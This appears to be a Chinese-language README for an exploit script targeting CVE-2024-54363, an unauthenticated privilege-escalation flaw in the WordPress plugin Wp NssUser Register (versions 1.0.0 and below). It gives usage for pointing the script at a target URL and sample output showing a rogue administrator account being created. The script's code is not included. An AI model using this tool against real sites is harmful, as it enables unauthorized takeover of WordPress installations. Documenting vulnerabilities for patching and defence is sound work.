nssTheme Wp NssUser Register 中存在不正确的权限分配漏洞,可导致权限提升。此漏洞影响 Wp NssUser Register 版本 n/a 至 1.0.0。
WordPress 插件 nssTheme Wp NssUser Register 存在一个不正确的权限分配问题,导致权限提升。此漏洞允许攻击者在未经授权的情况下注册一个拥有管理员权限的新用户。受影响版本为 1.0.0 及以下。
Wp NssUser Register1.0.0 版本/wp-admin/admin-ajax.php 端点,且注册功能已启用。pip install -r requirements.txt
usage: CVE-2024-54363.py [-h] -u URL
Wp NssUser Register <= 1.0.0 - 未认证权限提升
options:
-h, --help 显示此帮助信息并退出
-u URL, --url URL WordPress 站点的基址 URL
The site http://target-wordpress-site.com is vulnerable. Exploitation in progress...
Exploitation successful!
Username: nxploit123
Password: nxploit
此脚本仅供教育用途。作者对因滥用此脚本造成的任何损害概不负责。